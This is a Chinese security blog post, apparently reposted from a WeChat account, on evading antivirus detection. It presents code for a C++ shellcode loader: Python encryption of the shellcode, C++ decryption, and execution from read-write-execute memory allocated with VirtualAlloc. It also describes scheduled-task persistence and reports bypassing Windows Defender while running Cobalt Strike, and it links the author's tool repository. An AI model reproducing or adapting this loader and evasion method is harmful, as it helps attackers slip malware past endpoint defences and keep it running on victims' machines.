千寻笔记:C++免杀记

admin 2022年4月11日21:28:22评论159 views字数 1870阅读6分14秒阅读模式
千寻笔记:C++免杀记
0x00 前言

看到师傅们不停的分享各种免杀的思路,收获颇多,学习总结之余也做了练习,最终实现了主流杀毒的免杀处理。

这里主要分享一下免杀思路,没有什么技术性。

千寻笔记:C++免杀记
0x01 shellcode Loader思路

shellcode加载器顾名思义就是通过申请内存、把shellcode放入内存来加载shellcode。

没有经过加密的shellcode做的免杀会直接被杀,所以就要对shellcode先进行一些加密处理后,然后通过本地或远程加载shellcode,在加载器程序中解密shellcode后写入申请的内存中即可。

shellcode的加载器大致流程下图所示:

千寻笔记:C++免杀记

千寻笔记:C++免杀记
0x02 加密算法

用Python自写加密算法通过随机密码进行加密,部分代码如下:shellcode加密函数

def encrypt2(srcStr,password):    arr = srcStr.split(',0x')    for i in range(1,len(arr)):        arr[i]=int(arr[i],16)        tempStr = ""        for index in range(len(str(arr[i]))):            tempStr=tempStr+password[int(str(arr[i])[index])]        arr[i]=str(len(tempStr))+tempStr    #print(arr)    return ''.join(arr)
随机密码
def shuffle_str(s):    str_list = list(s)    shuffle(str_list)    return ''.join(str_list)
passwd=shuffle_str('7032614895')
加密shellcode,这里是把加密的密码放在shellcode前面了。
jm =passwd+encrypt2(jm, passwd)

附一个加密后的shellcode图:

千寻笔记:C++免杀记

千寻笔记:C++免杀记
0x03 C++ shellcode Loader

部分代码如下:

提取加密后的shellcode及加密密码


char str[] = ""string str1(str);//密码string passwd1 = str1.substr(0, 10);//shellcodestring shellcode1 = str1.substr(10, str1.length());const char* shellcode2 = shellcode1.data();
对shellcode进行解密
int k = 0;for (int i = 0; i < shellcode1.length(); i++){  int len1;  len1 = shellcode2[i] - 48;  string dange = "";  for (int j = 0; j < len1; j++)  {    string a = to_string(shellcode2[i + j + 1] - 48);    int a1 = passwd1.find(a);    string a2 = to_string(a1);    dange.append(a2);  }  i = i + len1;  int dange4 = std::stoi(dange);  ss[k] = *((char*)&dange4);  k = k + 1;}

申请内存,把shellcode放入内存执行,此处使用自定义defer函数改变执行顺序(defer为Go自带函数):

LPVOID Memory = VirtualAlloc(NULL, sizeof(ss), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);defer(((void(*)())Memory)(););defer(memcpy(Memory, ss, sizeof(ss)););defer(if (Memory == NULL) { return 1; });

千寻笔记:C++免杀记
0x04 权限维持

这里自行参考微软官方Demo,通过C++调用com组件 ITaskService,来实现免杀权限维持的功能。

添加成功效果图如下:

千寻笔记:C++免杀记

千寻笔记:C++免杀记
0x05 效果

主流杀软静态查杀:

千寻笔记:C++免杀记

千寻笔记:C++免杀记

CS命令执行测试:

千寻笔记:C++免杀记

win11 Defender测试:

千寻笔记:C++免杀记

千寻笔记:C++免杀记

千寻笔记:C++免杀记
0x06 总结

print"没有长久的规避技术,免杀只是与反病毒技术的长久对抗。"

参考链接:

https://docs.microsoft.com/zh-cn/windows/win32/taskschd/logon-trigger-example--c---

项目地址(求star):

https://github.com/G73st/BypassAV


千寻笔记:C++免杀记


监制:船长、铁子   策划:格纸   文案:G73st   美工:青柠

原文始发于微信公众号(千寻安服):千寻笔记:C++免杀记

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年4月11日21:28:22
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   千寻笔记:C++免杀记http://cn-sec.com/archives/899697.html

发表评论

匿名网友 填写信息